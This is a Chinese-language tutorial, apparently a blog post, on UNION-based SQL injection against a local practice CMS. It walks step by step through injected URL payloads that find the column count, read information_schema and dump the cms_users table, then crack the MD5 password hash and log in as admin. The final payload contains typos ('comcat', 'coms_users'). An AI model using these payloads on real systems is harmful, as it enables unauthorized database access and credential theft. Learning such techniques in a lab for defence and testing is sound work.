文章目录
- 联合查询是什么?
- 联合查询获取cms账号密码
- 尝试登录
联合查询是什么?
适用数据库中的内容会回显到页面中来的情况。联合查询就是利用union select 语句,该语句会同时执行两条select 语句,实现跨库、跨表查询。
必要条件
两条select 语句查询结果具有相同列数:
对应的列数据类型相同(特殊情况下,条件被放松)。
联合查询就是利用SQL语句中的union select语句同时执行两条select语句,实现跨表查询的方法。
由于联合查询会将数据库中的两张表按照列数拼接(纵向拼接)后再进行查询,所以要求两条select语句查询的表必须******有相同的列数,并且数据类型相同,否则命令会报错。
联合查询获取cms账号密码
判断列数
打开cms数据库的网页:http://127.0.0.1/cms/show.php?id=33,用order by命令测试cms网页的列数有多少,order by 15正常回显,order by 16报错,一共有15列。
打开hackbar插件,在URL中输入命令测试:
在hackbar中输入下面的命令,相当于用联合查询语句在数据库中查表。通过让联合查询的第一个select语句查询为false,只回显后一个select语句,从而获取能回显的表的列数、数据库名字和版本号等信息。
判断回显位置:
?id=33 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
或
?id=-33 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
相当于
select * from table_name where id=33 and 1=2 union select
和
select * from table_name where id=-33 union select
运行结果:
语句的回显结果说明只有3列和11列能进行数据库的内容回显:
获取数据库名字:
将有回显的11列用database()函数代替,让它回显数据库的名称
?id=-33 union select 1,2,3,4,5,6,7,8,9,10,database(),12,13,14,15
运行结果:
获取数据库版本号:
原理同上
?id=-33 union select 1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15
运行结果:
指定获取元数据数据库中当前数据库存储表名的tables表中的字段(information_schema 元数据数据库(存储库名、表名(-- tables)、列名(-- columns))):
?id=-33 union select 1,2,3,4,5,6,7,8,9,10,hex(group_concat(table_name)),12,13,14,15 from information_schema.tables where table_schema=database()
因为联合查询中数据类型必须一致,所以用hex()函数将字符转成数字;where table_schema=database指定查询当前数据库的表名,也就是cms数据库;group_concat()函数将所有表名联合成一个列、一个字符串。
运行结果:
将16进制转字符:
获得结果:
cms_article
cms_category
cms_file
cms_friendlink
cms_message
cms_notice
cms_page
cms_users
注意到cms_users这个表,里面很可能储存了数据库的用户名和密码。
获取cms_users表的列的字段(内容):
?id=-33 union select 1,2,3,4,5,6,7,8,9,10,hex(group_concat(column_name)),12,13,14,15 from information_schema.columns where table_schema=database() and table_name='cms_users'
运行结果:
将16进制转字符:
获得结果:
userid
username
password
获取账密:
?id=-33 union select 1,2,3,4,5,6,7,8,9,10,comcat(username,0x3a,password),12,13,14,15 from coms_users
运行结果:
用md5解密后获得账号密码:
admin
123456
尝试登录
登录成功:
